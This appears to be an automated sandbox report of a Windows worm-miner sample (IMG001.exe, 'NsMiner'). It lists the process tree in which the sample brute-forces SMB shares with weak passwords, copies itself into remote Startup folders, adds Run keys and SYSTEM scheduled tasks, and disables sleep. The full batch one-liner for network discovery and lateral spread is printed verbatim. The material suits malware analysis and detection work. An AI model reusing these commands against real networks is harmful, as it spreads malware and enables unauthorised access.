C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0206" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0206" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0206" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0206" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0206" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0206" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "user" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "user" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0206" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0206" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "admin" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "admin" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0206" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0206" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"àäìèíèñòðàòîð"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"àäìèíèñòðàòîð"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- NTFS ADS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1602& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- NTFS ADS
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
-
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a5⤵
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "4⤵
-
C:\Windows\SysWOW64\net.exenet view \\10.127.255.2555⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i " "5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
